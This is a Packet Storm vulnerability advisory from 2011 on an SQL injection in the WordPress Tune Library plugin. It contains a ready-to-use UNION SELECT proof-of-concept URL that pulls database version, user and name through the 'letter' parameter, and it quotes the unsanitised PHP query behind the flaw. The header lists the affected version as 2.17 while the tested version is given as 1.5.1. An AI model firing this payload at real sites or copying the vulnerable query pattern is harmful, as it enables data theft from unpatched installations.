WordPress Tune Library 2.17 SQL Injection

2011-09-10T00:00:00
ID PACKETSTORM:104971
Type packetstorm
Reporter Miroslav Stampar
Modified 2011-09-10T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability  
# Date: 2011-09-10  
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)  
# Software Link: http://downloads.wordpress.org/plugin/tune-library.zip  
# Version: 1.5.1 (tested)  
# Notes: magic_quotes has to be turned off  
# Plugin setting "Filter artists by letter and show alphabetical navigation" has to be turned on  
  
---  
PoC  
---  
http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20  
  
---------------  
Vulnerable code  
---------------  
$artistletter = $_GET['letter'];  
...  
if ($options['oneletter'] == false || $showallartists == true)  
...  
else  
{  
if ($artistletter == '#')  
...  
else  
{  
$querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";  
}  
}  
  
`